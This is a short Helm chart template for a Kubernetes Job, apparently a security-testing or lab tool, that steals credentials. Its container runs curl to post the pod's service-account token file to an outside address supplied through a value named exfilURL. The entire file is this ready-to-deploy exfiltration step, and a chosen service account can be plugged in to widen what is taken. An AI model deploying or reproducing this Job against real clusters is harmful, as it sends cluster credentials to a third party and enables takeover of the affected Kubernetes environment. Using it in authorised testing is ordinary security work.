apiVersion: batch/v1
kind: Job
metadata:
  name: {{ .Release.Name }}
  namespace: {{ .Values.namespace }}
spec:
  template:
    metadata:
      name: {{ .Release.Name }}
    spec:
      serviceAccountName: {{ .Values.serviceAccountName }}
      containers:
        - name: {{ .Release.Name }}
          image: byrnedo/alpine-curl
          command: ["curl"]
          args: ["-d", "@/var/run/secrets/kubernetes.io/serviceaccount/token", "$(EXFIL_URL)"]
          env:
            - name: EXFIL_URL
              value: {{ .Values.exfilURL }}
      restartPolicy: {{ .Values.restartPolicy }}